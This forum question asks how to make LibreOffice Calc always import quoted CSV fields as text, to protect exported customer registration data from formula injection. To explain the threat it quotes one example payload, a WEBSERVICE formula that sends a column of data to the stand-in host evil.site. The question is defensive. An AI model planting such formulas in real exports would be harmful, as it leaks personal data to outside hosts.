We have a web application, the backend of which allows batch downloading csvs with e.g. data of the people registered on our site.
When these csvs are opened in libreoffice calc, we would preferably not have data in the csv be interpreted as formulas, as this might leak data from the spreadsheet to unknown sources (For example if someone wrote =WEBSERVICE(CONCAT("evil.site/logger.php?data=",U2:U3000))
in one of the cells, the data in column U
will be leaked to evil.site
. If multiple such entries are entered for different columns, we have a big problem.)
Indeed one does get a message saying “Confirmation This file contains links to other files. Should they be updated?”, where clicking no
will not leak the data. However, our backend users might very well click yes
sometimes, as I cannot tell all our current and future backend users to watch out for this button.
This problem is easily avoided with the Format quoted field as text
button in the Text Import
window. However, if a backend user has opened a different csv with this option disabled, the next time he/she will open a sensitive csv, this option is turned of. Is it possible to have this option always turned on, i.e. that the end user always has to willingly make the insecure decision himself?
EDIT: thank you four your reply. So to be clear: we have front end users (‘customers’) and back end users (‘organisers’) and the organisers can download csvs with the info that the customers have filled in in the registration form on the front end.
The malicious code gets inserted if an evil customer fills it in in one of the fields on the online form.
Now for the organisers to do what they want to do with the data, it is convenient to have it all in one manageable file that can be opened by several applications of the organisers choice, e.g. vim, less, gedit, geany, libreoffice, Google sheats (although I would rather not have Google know all our data) etc. I would rather not dictate our organisers to use libreoffice or a similar program that can handle ods files, I myself prefer gedit. However if the organisers choose to open the csv with libreoffice (and most of them do), I would like it if the safe option ( force all fields to type text ) is the default, such that I do not have to explain that they should watch this one button on the import screen. It would be better if the button would always default to the safe option, instead of remembering the previous setting, and I am asking how to make libreoffice default to this (clearly safer) setting.
So I am not asking if it is possible to handle the csv safely despite this setting being unsafe, I am asking how I can make the libreoffice application use the safe option per default (at least on the organisers’ machines, where I install libreoffice and can do some global settings if necessary)